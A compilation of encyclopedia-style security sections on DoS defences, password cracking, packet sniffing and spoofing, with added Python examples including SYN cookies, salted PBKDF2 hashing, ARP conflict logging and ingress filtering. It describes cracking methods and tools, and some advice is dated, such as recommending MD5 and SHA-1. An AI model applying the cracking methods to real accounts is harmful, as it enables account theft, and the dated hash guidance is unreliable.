Denial of Service attacks can also lead to problems in the network 'branches' around the actual computer being attacked. For example, the bandwidth of a router between the Internet and a LAN may be consumed by a DoS, meaning not only will the intended computer be compromised, but the entire network will also be disrupted. This is another, more complex form of the DDoS, wherein the "zombies" can be located on the target system itself, thus increasing network traffic on either side of the target. If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet connectivity can also be compromised by incorrectly configured or flimsy network infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all, ISPs ban the practice.

Common malware
- Stacheldraht
- Tribe Flood Network
- Trinoo

Prevention and response

Surviving attacks
The investigative process should begin immediately after the DoS attack begins. There will be multiple phone calls, call backs, emails, pages and faxes between the victim organization, one's provider and others involved. It is a time consuming process, so the process should begin immediately. It has taken some very large networks with plenty of resources several hours to halt a DDoS. The easiest way to survive an attack is to have planned for the attack. Having a separate emergency block of IP addresses for critical servers with a separate route can be invaluable. A separate route (perhaps a DSL) is not that extravagant, and it can be used for load balancing or sharing under normal circumstances and switched to emergency mode in the event of an attack. Filtering is generally pretty ineffective, as the route to the filter will normally be swamped so only a trickle of traffic will survive.


SYN Cookies
SYN cookies modify the server's TCP handling by delaying allocation of resources until the client address has been verified. This seems to be the most powerful defense against SYN attacks. There are Solaris and Linux implementations. The Linux implementation can be turned on at runtime of the Linux kernel.
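The mechanism described above, as an added example that is not from the original text or any kernel's source: the server encodes a keyed MAC, a coarse time counter and the client's MSS into the SYN-ACK sequence number instead of storing a half-open entry, and only allocates state once the client's ACK proves it received that number. The field layout and the secret are simplified and constructed for illustration.

```python
"""SYN-cookie style stateless handshake check (simplified model)."""
import hashlib
import hmac

SERVER_SECRET = b"constructed-demo-secret"  # constructed; a real server uses a rotating random key
MSS_TABLE = (536, 1220, 1440, 1460)         # the MSS values we can encode; index goes in a 3-bit field
MASK32 = 0xFFFFFFFF


def _mac(client_ip, server_ip, client_port, server_port, counter, mss_idx):
    """24-bit keyed MAC over the 4-tuple, the time slot and the MSS index."""
    msg = f"{client_ip}|{server_ip}|{client_port}|{server_port}|{counter}|{mss_idx}".encode()
    digest = hmac.new(SERVER_SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def _slot(now):
    """64-second time slot, 5 bits wide (wraps every 32 slots)."""
    return (int(now) // 64) & 0x1F


def make_cookie(client_ip, server_ip, client_port, server_port, mss, now):
    """Build the 32-bit ISN: 5 bits slot | 3 bits MSS index | 24 bits MAC."""
    counter = _slot(now)
    mss_idx = 0
    for i, m in enumerate(MSS_TABLE):   # largest table entry not above the client's MSS
        if m <= mss:
            mss_idx = i
    mac = _mac(client_ip, server_ip, client_port, server_port, counter, mss_idx)
    return ((counter << 27) | (mss_idx << 24) | mac) & MASK32


def check_cookie(client_ip, server_ip, client_port, server_port, ack, now, max_age=2):
    """Return the encoded MSS if ack-1 is a cookie we issued within max_age slots, else None."""
    cookie = (ack - 1) & MASK32
    counter, mss_idx, mac = cookie >> 27, (cookie >> 24) & 0x7, cookie & 0xFFFFFF
    if ((_slot(now) - counter) & 0x1F) > max_age:
        return None                     # stale cookie: rejected without ever storing state
    if mss_idx >= len(MSS_TABLE):
        return None
    expected = _mac(client_ip, server_ip, client_port, server_port, counter, mss_idx)
    if not hmac.compare_digest(mac.to_bytes(3, "big"), expected.to_bytes(3, "big")):
        return None                     # forged, or replayed from a different 4-tuple
    return MSS_TABLE[mss_idx]


class SynCookieListener:
    """Server side: nothing stored on SYN, state allocated only on a valid ACK."""

    def __init__(self, ip, port):
        self.ip, self.port = ip, port
        self.established = {}           # (client_ip, client_port) -> mss

    def on_syn(self, client_ip, client_port, client_mss, now):
        # Answer with a SYN-ACK whose ISN is the cookie; no backlog entry is created,
        # so a flood of spoofed SYNs costs the server no memory.
        return make_cookie(client_ip, self.ip, client_port, self.port, client_mss, now)

    def on_ack(self, client_ip, client_port, ack, now):
        mss = check_cookie(client_ip, self.ip, client_port, self.port, ack, now)
        if mss is None:
            return False
        self.established[(client_ip, client_port)] = mss
        return True


if __name__ == "__main__":
    srv = SynCookieListener("203.0.113.10", 80)
    t0 = 1_700_000_000
    for i in range(10_000):             # constructed flood of SYNs from spoofed sources
        srv.on_syn(f"198.51.100.{i % 250}", 1024 + i, 1460, t0)
    print("half-open entries after flood:", len(srv.established))
    isn = srv.on_syn("192.0.2.7", 40000, 1460, t0)
    print("legitimate handshake completed:", srv.on_ack("192.0.2.7", 40000, (isn + 1) & MASK32, t0 + 5))
```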

Firewalls
Firewalls have simple rules such as to allow or deny protocols, ports or IP addresses. DoS attacks are too complex for today's firewalls. For example, if there is an attack on port 80 (web service), firewalls cannot prevent that attack because they cannot distinguish good traffic from DoS attack traffic. Additionally, firewalls are too deep in the network hierarchy: your router may be affected even before the firewall sees the traffic. Modern stateful firewalls like Check Point FW1 NGX and Cisco PIX have a built-in capability to differentiate good traffic from DoS attack traffic. This capability is known as a "Defender", as it confirms TCP connections are valid before proxying TCP packets to service networks (including border routers).

Switches
Most switches have some rate-limiting and ACL capability. Some switches provide automatic and/or system-wide rate limiting, traffic shaping, delayed binding (TCP splicing), deep packet inspection and bogon filtering (bogus IP filtering) to detect and remediate denial of service attacks through automatic rate filtering and WAN link failover and balancing. These schemes work as long as the DoS attacks are something that can be prevented using them. For example, a SYN flood can be prevented using delayed binding or TCP splicing. Similarly, content-based DoS can be prevented using deep packet inspection. Attacks originating from dark addresses or going to dark addresses can be prevented using bogon filtering. Automatic rate filtering works as long as you have set rate thresholds correctly and granularly. WAN link failover works as long as both links have DoS/DDoS prevention mechanisms.


Routers
Similar to switches, routers have some rate-limiting and ACL capability. They too are manually set. Most routers can be easily overwhelmed under a DoS attack. If you add rules to take flow statistics out of the router during the DoS attack, they further slow down and complicate the matter. Cisco IOS has features that prevent flooding, i.e. example settings

Application front end hardware


Application front end hardware is intelligent hardware placed on the network before traffic reaches the servers. It can be used on networks in conjunction with routers and switches. Application front end hardware analyzes data packets as they enter the system, and then identifies them as priority, regular, or dangerous. There are more than 25 bandwidth management vendors. Hardware acceleration is key to bandwidth management. Look for granularity of bandwidth management, hardware acceleration, and automation while selecting an appliance.

IPS based prevention


Intrusion-prevention systems are effective if the attacks have signatures associated with them. However, the trend among the attacks is to have legitimate content but bad intent. IPS systems which work on content recognition cannot block behavior-based DoS attacks. An ASIC-based IPS can detect and block denial of service attacks because it has the processing power and the granularity to analyze the attacks and act like a circuit breaker in an automated way. A rate-based IPS (RBIPS) must analyze traffic granularly, continuously monitor the traffic pattern and determine whether there is a traffic anomaly. It must let the legitimate traffic flow while blocking the DoS attack traffic.


Passwords
Passwords to access computer systems are usually stored, typically not in cleartext form, in a database so the system can perform password verification when users attempt to log in. To preserve confidentiality of system passwords, the password verification data is typically generated by applying a one-way function to the password, possibly in combination with other data. For simplicity in this discussion, when the one-way function (which may be either an encryption function or a cryptographic hash) does not incorporate a secret key other than the password, we will refer to the one-way function employed as a hash and its output as a hashed password. Even though functions that create hashed passwords may be cryptographically secure, possession of a hashed password provides a quick way to test guesses for the password by applying the function to each guess and comparing the result to the verification data. The most commonly used hash functions can be computed rapidly, and the attacker can test guesses repeatedly with different guesses until one succeeds, meaning the plaintext password has been recovered. The term password cracking is typically limited to recovery of one or more plaintext passwords from hashed passwords. Password cracking requires that an attacker can gain access to a hashed password, either by reading the password verification database (e.g., via a Trojan horse, virus program, or social engineering) or intercepting a hashed password sent over an open network, or has some other way to rapidly and without limit test whether a guessed password is correct. Without the hashed version of a password, the attacker can still attempt access to the computer system in question with guessed passwords. However, well-designed systems limit the number of failed access attempts and can alert administrators to trace the source of the attack if that quota is exceeded.

With the hashed password, the attacker can work undetected, and if the attacker has obtained several hashed passwords, the chances of cracking at least one are quite high. There are also many other ways of obtaining passwords illicitly, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attacks, acoustic cryptanalysis, identity management system attacks and compromising host security (see password for details). However, cracking usually designates a guessing attack.

Cracking may be combined with other techniques. For example, use of a hash-based challenge-response authentication method for password verification may provide a hashed password to an eavesdropper, who can then crack the password. A number of stronger cryptographic protocols exist that do not expose hashed passwords during verification over a network, either by protecting them in transmission using a high-grade key, or by using a zero-knowledge password proof.

Principal attack methods


Weak encryption
If a system uses a cryptographically weak function to hash or encrypt passwords, exploiting that weakness can recover even 'well-chosen' passwords. Decryption need not be a quick operation, and can be conducted while not connected to the target system. Any 'cracking' technique of this kind is considered successful if it can decrypt the password in fewer operations than would be required by a brute force attack (see below). The fewer operations required, the "weaker" the encryption is considered to be (for equivalently well-chosen passwords). One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length. LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately. Progress in cryptography has made available functions which are believed to actually be "one way" hashes, such as MD5 or SHA-1. These are thought to be impossible to invert in practice. When quality implementations of good cryptographic hash functions are correctly used for authentication, password cracking through decryption can be considered infeasible.

Guessing
Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:
- blank (none)
- the word "password", "passcode", "admin" and their derivatives
- the user's name or login name
- the name of their significant other or another relative
- their birthplace or date of birth
- a pet's name
- automobile licence plate number
- a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters
- a row of letters from a standard keyboard layout (e.g. on the qwerty keyboard: qwerty itself, asdf, or qwertyuiop)
- and so on.

Some users even neglect to change the default password that came with their account on the computer system. And some administrators neglect to change default account passwords provided by the operating system vendor or hardware supplier. A famous example is the use of FieldService as a user name with Guest as the password. If not changed at system configuration time, anyone familiar with such systems will have 'cracked' an important password; such service accounts often have higher access privileges than a normal user account. The determined cracker can easily develop a computer program that accepts personal information about the user being attacked and generates common variations for passwords suggested by that information.

Dictionary attack
A dictionary attack also exploits the tendency of people to choose weak passwords, and is related to the previous attack. Password cracking programs usually come equipped with "dictionaries", or word lists, with thousands or even millions of entries of several kinds, including:
- words in various languages
- names of people
- places
- commonly used passwords

The cracking program encrypts each word in the dictionary, and simple modifications of each word, and checks whether any match an encrypted password. This is feasible because the attack can be automated and, on inexpensive modern computers, several thousand possibilities can be tried per second. Guessing, combined with dictionary attacks, has been repeatedly and consistently demonstrated for several decades to be sufficient to crack perhaps as many as 50% of all account passwords on production systems.

Brute force attack


A last resort is to try every possible password, known as a brute force attack. In theory, a brute force attack will always be successful since the rules for acceptable passwords must be publicly known, but as the length of the password increases, so does the number of possible passwords. This method is unlikely to be practical unless the password is relatively small. But how small is too small? A common current length recommendation is 8 or more randomly chosen characters combining letters, numbers, and special (punctuation, etc.) characters. Systems which limit passwords to numeric characters only, or upper case only, or, generally, which exclude possible password character choices make such attacks easier. Using longer passwords in such cases (if possible on a particular system) can compensate for a limited allowable character set. And, of course, even with an adequate range of character choice, users who ignore that range (using only upper case alphabetic characters, or digits alone, for instance) make brute force attacks much easier against those password choices. Generic brute-force search techniques can be used to speed up the computation. But the real threat may be likely to be from smart brute-force techniques that exploit knowledge about how people tend to choose passwords. NIST SP 800-63 (2) provides further discussion of password quality, and suggests, for example, that an 8 character user-chosen password may provide somewhere between 18 and 30 bits of entropy, depending on how it is chosen. Note: this number is far less than what is generally considered to be safe for an encryption key. How small is too small thus depends partly on an attacker's ingenuity and resources (e.g., available time, computing power, etc.), the latter of which will increase as computers get faster. Most commonly used hashes can be implemented using specialized hardware, allowing faster attacks.

Large numbers of computers can be harnessed in parallel, each trying a separate portion of the search space. Unused overnight and weekend time on office computers can also be used for this purpose. The distinction between guessing, dictionary and brute force attacks is not strict. They are similar in that an attacker goes through a list of candidate passwords one by one; the list may be explicitly enumerated or implicitly defined, may or may not incorporate knowledge about the victim, and may or may not be linguistically derived. Each of the three approaches, particularly 'dictionary attack', is frequently used as an umbrella term to denote all three attacks and the spectrum of attacks encompassed by them.

Precomputation
In its most basic form, precomputation involves hashing each word in the dictionary (or any search space of candidate passwords) and storing the <plaintext, ciphertext> pairs in a way that enables lookup on the ciphertext field. This way, when a new encrypted password is obtained, password recovery is instantaneous. Precomputation can be very useful for a dictionary attack if salt is not used properly (see below), and the dramatic decrease in the cost of mass storage has made it practical for fairly large dictionaries. Advanced precomputation methods exist that are even more effective. By applying a time-memory tradeoff, a middle ground can be reached: a search space of size N can be turned into an encrypted database of size O(N^(2/3)) in which searching for an encrypted password takes time O(N^(2/3)). The theory has recently been refined into a practical technique, and the online implementation at http://passcracking.com/ achieves impressive results on 8 character alphanumeric MD5 hashes. Another example [1] cracks alphanumeric Windows LAN Manager passwords in a few seconds. This is much faster than brute force attacks on the obsolete LAN Manager, which uses a particularly weak method of hashing the password. Current Windows systems still compute and store a LAN Manager hash by default for backwards compatibility. [2] A technique similar to precomputation, known generically as memoization, can be used to crack multiple passwords at the cost of cracking just one. Since encrypting a word takes much longer than comparing it with a stored word, a lot of effort is saved by encrypting each word only once and comparing it with each of the encrypted passwords using an efficient list search algorithm. The two approaches may of course be combined: the time-space tradeoff attack can be modified to crack multiple passwords simultaneously in a shorter time than cracking them one after the other.

Salting
The benefits of precomputation and memoization can be nullified by randomizing the hashing process. This is known as salting. When the user sets a password, a short, random string called the salt is suffixed to the password before encrypting it; the salt is stored along with the encrypted password so that it can be used during verification. Since the salt is usually different for each user, the attacker can no longer construct tables with a single encrypted version of each candidate password. Early Unix systems used a 12-bit salt. Attackers could still build tables with common passwords encrypted with all 4096 possible 12-bit salts. However, if the salt is long enough (e.g. 32 bits), there are too many possibilities and the attacker must repeat the encryption of every guess for each user.

Early Unix password vulnerability


Early Unix implementations used a 12-bit salt, which allowed for 4096 possibilities, and limited passwords to 8 characters. While 12 bits was good enough for most purposes in the 1970s (although some expressed doubts even then), by 2005 disk storage had become cheap enough that an attacker can precompute encryptions of millions of common passwords, including all 4096 possible salt variations for each password, and store the precomputed values on a single portable hard drive. An attacker with a larger budget can build a disk farm with all 6 character passwords and the most common 7 and 8 character passwords stored in encrypted form, for all 4096 possible salts. And when several thousand passwords are being cracked at once, memoization still offers some benefit. Since there is little downside to using a longer (say 32-, 64- or 128-bit) salt, and they render any precomputation or memoization hopeless, modern implementations choose to do so.
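The precomputation, salting and 12-bit-salt points above, plus the key strengthening with PBKDF2 that the Prevention section mentions, as an added example that is not from the original text. It uses a constructed five-word list and SHA-256 in place of the historical functions: an unsalted hash is recovered by one table lookup, a 12-bit salt only multiplies the table by 4096, and a 16-byte random salt with PBKDF2 leaves no table to build and makes every guess cost many iterations.

```python
"""Precomputed lookup tables versus salted, strengthened password verifiers."""
import hashlib
import hmac
import os

# Constructed stand-in for a cracking dictionary.
WORDLIST = ["password", "letmein", "qwerty", "admin", "welcome1"]


def unsalted_hash(password):
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password, salt):
    """Salt suffixed to the password, as the text describes; the salt is stored alongside."""
    return hashlib.sha256(password.encode() + salt).hexdigest()


def precompute_table(words):
    """hash -> word for an unsalted scheme: one hash per word, computed once, reused forever."""
    return {unsalted_hash(w): w for w in words}


def precompute_salted_table(words, salt_bits):
    """(salt, hash) -> word for every possible short salt: 2**salt_bits times the work.

    Feasible for the 12-bit salts of early Unix; hopeless for 32 bits and beyond.
    """
    table = {}
    for value in range(2 ** salt_bits):
        salt = value.to_bytes((salt_bits + 7) // 8, "big")
        for w in words:
            table[(salt, salted_hash(w, salt))] = w
    return table


def make_record(password, iterations=200_000):
    """Stored verifier: 16-byte random salt plus PBKDF2-HMAC-SHA256 (key strengthening)."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "dk": dk}


def verify(record, attempt):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    dk = hashlib.pbkdf2_hmac("sha256", attempt.encode(), record["salt"], record["iterations"])
    return hmac.compare_digest(dk, record["dk"])


if __name__ == "__main__":
    table = precompute_table(WORDLIST)
    print("unsalted lookup:", table.get(unsalted_hash("letmein")))
    salt12 = (0xABC).to_bytes(2, "big")                    # constructed 12-bit salt value
    table12 = precompute_salted_table(WORDLIST, 12)
    print("12-bit salt: table has", len(table12), "entries, lookup gives",
          table12.get((salt12, salted_hash("letmein", salt12))))
    rec = make_record("letmein")
    print("pbkdf2 verify:", verify(rec, "letmein"), verify(rec, "letmein1"))
```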

Prevention
The best method of preventing password cracking is to ensure that attackers cannot get access even to the encrypted password. For example, on the Unix operating system, encrypted passwords were originally stored in a publicly accessible file "/etc/passwd". On modern Unix (and similar) systems, on the other hand, they are stored in the file "/etc/shadow", which is accessible only to programs running with enhanced privileges (i.e. 'system' privileges). This makes it harder for a malicious user to obtain the encrypted passwords in the first instance. Unfortunately, many common network protocols transmit the hashed passwords to allow remote authentication. Even if the attacker has no access to the password database itself, attackers should also be prevented from being able to use the system itself to check a large number of passwords in a relatively small amount of time. For this reason, many systems include a significant forced delay (a few seconds is generally sufficient) between the entry of the password and returning a result. Also, it is a good policy to (temporarily) lock out an account that has been subjected to 'too many' incorrect password guesses, although this could be exploited to launch a denial of service attack. Too many in this context is frequently taken to be something like more than 3 failed attempts in 90 seconds, or more than a dozen failed attempts in an hour.

It is also imperative to choose good passwords (see password for more information) and a good encryption or hash algorithm that has stood the test of time. AES, SHA-1, and MD5 are common choices. Good implementations, including adequate salt, are also required. Key derivation functions, such as PBKDF2, are hashes that consume relatively large amounts of computer time so as to slow down the rate at which an attacker can test guesses, even if the hashed password is available. This process is known as key strengthening. However, no amount of effort put into preventing password cracking can be sufficient without a well-designed and well-implemented security policy. The canonical and all too common example of this is the user who leaves their password on a Post-It note stuck to their monitor or under their keyboard. Even sophisticated users who have been warned repeatedly are known to have such lapses.

Password cracking programs

Ophcrack
Ophcrack is an open source (GPL license) program that cracks Windows LM hashes using rainbow tables. It can crack 99.9% of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. There is also a LiveCD version which automates the retrieval, decryption, and cracking of passwords from a Windows system. Starting with version 2.3, Ophcrack also cracks NT hashes.

Crack
Crack is a Unix password cracking program designed to allow system administrators to locate users who may have weak passwords vulnerable to a dictionary attack. Crack began in 1990 when Alec Muffett, a Unix system administrator at the University of Wales Aberystwyth, was trying to improve Dan Farmer's 'pwc' cracker in COPS and found that by re-engineering its memory management he got a noticeable performance increase. This led to a total rewrite which became "Crack v2.0" and further development to improve usability.

Cain
Cain and Abel is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing and cracking various password hashes using dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain. Cain and Abel is maintained by Massimiliano Montoro.

John the Ripper
John the Ripper is a free password cracking software tool. Initially developed for the UNIX operating system, it currently runs on fifteen different platforms (11 flavors of Unix, counting each flavor only once for all the architectures it supports, plus DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects, and includes a customisable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL and others. John the Ripper is a perfectly safe program to install and run on your computer. If you are running a multi-user system, you should make sure you are shadowing your password file such that the hashes are not visible; however, even if you are not, not installing John will not prevent a malicious user from running John on their own computer with your hashes.

LC5 (formerly L0phtCrack)
L0phtCrack is a password auditing and recovery application (now called LC5), originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, and hybrid attacks. It was one of the crackers' tools of choice, although most use old versions because of its price and low availability. The application was produced by @stake after the L0pht merged with @stake in 2000. @stake was acquired by Symantec in 2004. Symantec has since stopped selling this tool to new customers, citing US Government export regulations, and has announced that it will discontinue support by the end of 2006. LC5 can still be found at SecTools.Org and other unofficial mirrors.

RainbowCrack
RainbowCrack is the name of a computer program which performs password cracking. RainbowCrack differs from "conventional" brute force crackers in that it uses large precomputed files called rainbow tables to reduce drastically the length of time needed to crack a password. RainbowCrack was developed by Zhu Shuanglei, and implements an improved time-memory trade-off cryptanalysis attack which originated in Philippe Oechslin's Ophcrack.


Sniffers: Basics and Detection


If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.

Introduction
A sniffer is a program or a device that eavesdrops on the network traffic by grabbing information traveling over a network. Sniffers basically are "Data Interception" technology. They work because the Ethernet was built around a principle of sharing. Most networks use broadcast technology wherein messages for one computer can be read by another computer on that network. In practice, all the other computers except the one for which the message is meant, will ignore that message. However, computers can be made to accept messages even if they are not meant for them. This is done by means of a Sniffer! Many people assume computers connected to a switch are safe from sniffing. Nothing could be further from the truth. Computers connected to switches are just as vulnerable to sniffing as those connected to a hub. This article seeks to explore the topic of sniffers, how they work, detecting and protecting your assets against the malicious use of these programs. Finally, towards the end we will talk about some commonly available sniffers.

How A Sniffer Works


A computer connected to the LAN has two addresses. One is the MAC (Media Access Control) address that uniquely identifies each node in a network and is stored on the network card itself. It is the MAC address that gets used by the Ethernet protocol while building frames to transfer data to and from a machine. The other is the IP address, which is used by applications. The Data Link Layer uses an Ethernet header with the MAC address of the destination machine rather than the IP address. The Network Layer is responsible for mapping IP network addresses to the MAC address as required by the Data Link Protocol. It initially looks up the MAC address of the destination machine in a table, usually called the ARP (Address Resolution Protocol) cache. If no entry is found for the IP address, the Address Resolution Protocol broadcasts a request packet (ARP request) to all machines on the network. The machine with that address responds to the source machine with its MAC address. This MAC address then gets added to the source machine's ARP cache. The source machine in all its communications with the destination machine then uses this MAC address.

There are two basic types of Ethernet environments, and how sniffers work in each case is slightly different.

Shared Ethernet: In a shared Ethernet environment, all hosts are connected to the same bus and compete with one another for bandwidth. In such an environment packets meant for one machine are received by all the other machines. Thus when a machine Venus

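The ARP resolution described above, as an added example that is not from the original text: a parser for Ethernet/ARP frames (RFC 826 layout) and an ARP cache that learns IP-to-MAC mappings from replies. The hosts Venus and Mars, their addresses and the frames are constructed; the cache also records a reply that contradicts an entry it already holds, the kind of inconsistency a sniffer-detection tool on a switched segment watches for.

```python
"""Ethernet/ARP frame parsing and a small ARP cache with conflict logging."""
import struct

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = b"\xff" * 6


def build_arp(sender_mac, sender_ip, target_mac, target_ip, op):
    """Construct an Ethernet+ARP frame (used only to produce sample input)."""
    eth_dst = BROADCAST if op == ARP_REQUEST else target_mac
    ethernet = eth_dst + sender_mac + struct.pack("!H", ETHERTYPE_ARP)
    # hardware type 1 (Ethernet), protocol 0x0800 (IPv4), hlen 6, plen 4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + sender_mac + sender_ip + target_mac + target_ip
    return ethernet + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": frame[22:28].hex(":"),
        "sender_ip": ".".join(str(b) for b in frame[28:32]),
        "target_mac": frame[32:38].hex(":"),
        "target_ip": ".".join(str(b) for b in frame[38:42]),
    }


class ArpCache:
    """IP -> MAC table learned from ARP replies, plus a log of contradictory replies."""

    def __init__(self):
        self.table = {}
        self.conflicts = []     # (ip, previously learned MAC, newly claimed MAC)

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            return None         # requests only ask; the reply carries the binding we cache
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        old = self.table.get(ip)
        if old is not None and old != mac:
            self.conflicts.append((ip, old, mac))
        self.table[ip] = mac
        return ip, mac


# Constructed hosts: Venus asks for Mars, Mars replies, then a third card claims Mars's IP.
VENUS = (bytes.fromhex("020000000001"), bytes([10, 0, 0, 1]))
MARS = (bytes.fromhex("020000000002"), bytes([10, 0, 0, 2]))
OTHER = (bytes.fromhex("020000000003"), bytes([10, 0, 0, 2]))

SAMPLE_FRAMES = [
    build_arp(VENUS[0], VENUS[1], b"\x00" * 6, MARS[1], ARP_REQUEST),
    build_arp(MARS[0], MARS[1], VENUS[0], VENUS[1], ARP_REPLY),
    build_arp(OTHER[0], OTHER[1], VENUS[0], VENUS[1], ARP_REPLY),
]


def run_cache(frames):
    """Feed frames through a fresh cache and return it for inspection."""
    cache = ArpCache()
    for f in frames:
        cache.observe(f)
    return cache


if __name__ == "__main__":
    c = run_cache(SAMPLE_FRAMES)
    print("cache:", c.table)
    print("conflicting replies:", c.conflicts)
```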

Well-known packet sniffers


- AiroPeek
- dSniff
- Ethereal
- EtherPeek
- Ettercap
- Kismet
- Javvin Packet Analyzer
- NetStumbler
- Network General Sniffer
- Network Instruments Observer
- OmniPeek
- PRTG
- snoop (Solaris)
- tcpdump
- Wireshark (formerly known as Ethereal[1])
- WPE (Winsock packet editor)

Spoofing attack
In the context of network security, a spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data and thereby gains an illegitimate advantage.

Man-in-the-middle attack and internet protocol spoofing


An example from cryptography is the man-in-the-middle attack, in which an attacker spoofs Alice into believing he's Bob, and spoofs Bob into believing he's Alice, thus gaining access to all messages in both directions without the trouble of any cryptanalytic effort. The attacker must monitor the packets sent from Alice to Bob and then guess the sequence number of the packets. Then the attacker knocks out Alice with a SYN attack and injects his own packets, claiming to have the address of Alice. Alice's firewall can defend against some spoof attacks when it has been configured with knowledge of all the IP addresses connected to each of its interfaces. It can then detect a spoofed packet if it arrives at an interface that is not known to be connected to that IP address. Many carelessly designed protocols are subject to spoof attacks, including many of those used on the Internet. See Internet protocol spoofing.
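The interface-aware check the paragraph attributes to Alice's firewall, as an added example that is not from the original text: a filter that knows which address ranges sit behind each interface drops a packet whose source could not legitimately arrive there, whether an internal address showing up on the uplink or a foreign address on a LAN port. Interface names, prefixes and the sample packets are constructed.

```python
"""Ingress (anti-spoofing) filter keyed on the arriving interface."""
import ipaddress


class IngressFilter:
    def __init__(self, lan_prefixes, uplink="wan"):
        # interface -> networks known to be connected behind it
        self.lan = {ifc: [ipaddress.ip_network(p) for p in nets]
                    for ifc, nets in lan_prefixes.items()}
        self.uplink = uplink

    def _is_internal(self, addr):
        return any(addr in net for nets in self.lan.values() for net in nets)

    def verdict(self, iface, src_ip):
        """Return 'allow' or a 'drop: ...' reason for a packet with src_ip arriving on iface."""
        src = ipaddress.ip_address(src_ip)
        if iface == self.uplink:
            # Packets from outside must not claim an address that lives on one of our LANs.
            return "drop: internal source on uplink" if self._is_internal(src) else "allow"
        nets = self.lan.get(iface)
        if nets is None:
            return "drop: unknown interface"
        # A LAN port may only source addresses from the prefixes behind it.
        return "allow" if any(src in net for net in nets) else "drop: source not behind interface"


def filter_packets(flt, packets):
    """Apply the filter to (iface, src_ip, dst_ip) tuples; return (allowed, dropped) lists."""
    allowed, dropped = [], []
    for iface, src, dst in packets:
        v = flt.verdict(iface, src)
        (allowed if v == "allow" else dropped).append((iface, src, dst, v))
    return allowed, dropped


# Constructed topology and traffic sample.
FILTER = IngressFilter({"eth1": ["10.1.0.0/16"], "eth2": ["192.168.5.0/24"]}, uplink="wan")
SAMPLE_PACKETS = [
    ("wan", "203.0.113.5", "10.1.2.3"),      # ordinary inbound packet
    ("wan", "10.1.2.3", "10.1.2.9"),         # outside packet claiming an internal address
    ("eth1", "10.1.2.3", "203.0.113.5"),     # ordinary outbound packet from LAN 1
    ("eth1", "192.168.5.9", "203.0.113.5"),  # LAN 2 address appearing on the LAN 1 port
    ("eth3", "10.9.9.9", "10.1.2.3"),        # interface the filter was never told about
]

if __name__ == "__main__":
    ok, bad = filter_packets(FILTER, SAMPLE_PACKETS)
    for entry in bad:
        print(entry)
```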

URL spoofing and phishing


Another kind of spoofing is "webpage spoofing," also known as phishing. In this attack, a legitimate web page such as a bank's site is reproduced in "look and feel" on another server under control of the attacker. The intent is to fool the users into thinking that they are connected to a trusted site, for instance to harvest user names and passwords. This attack is often performed with the aid of URL spoofing, which exploits web browser bugs in order to display incorrect URLs in the browser's location bar, or with DNS cache poisoning in order to direct the user away from the legitimate site and to the fake one. Once the user puts in their password, the attack code reports a password error, then redirects the user back to the legitimate site.

Referer spoofing
Some websites, especially pornographic paysites, allow access to their materials only from certain approved (login) pages. This is enforced by checking the Referer header of the HTTP request. This Referer header however can be changed (known as "Referer spoofing" or "Ref-tar spoofing"), allowing users to gain unauthorized access to the materials.

Poisoning of file-sharing networks
"Spoofing" can also refer to copyright holders placing distorted or unlistenable versions of works on file-sharing networks, to discourage downloading from these sources.
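The Referer check described above next to a server-side replacement for it, as an added Python example (not code from the original page): the approved page URL, the header values, the secret key and the user names are constructed.

```python
"""A Referer-based access check beside a signed-token check that does not
depend on any client-supplied header.

Added example, not from the original page.  Page URL, key and names below
are constructed for illustration.
"""
import hashlib
import hmac
import time
from typing import Optional

APPROVED_PAGES = {"https://paysite.example/members/login"}   # constructed


def referer_allows(headers: dict) -> bool:
    """The enforcement the text describes: admit the request if the Referer
    names an approved page.  The client chooses this header, so it proves
    nothing about where the request really came from."""
    return headers.get("Referer", "") in APPROVED_PAGES


# Replacement: after a genuine login the server issues a token bound to the
# user and a timestamp, signed with a key only the server holds.  Access is
# then granted to requests carrying a token that verifies, and the Referer
# plays no part.
SECRET_KEY = b"constructed-demo-key-not-for-real-use"
TOKEN_TTL = 600   # seconds a token stays valid


def _sign(user: str, ts: int) -> str:
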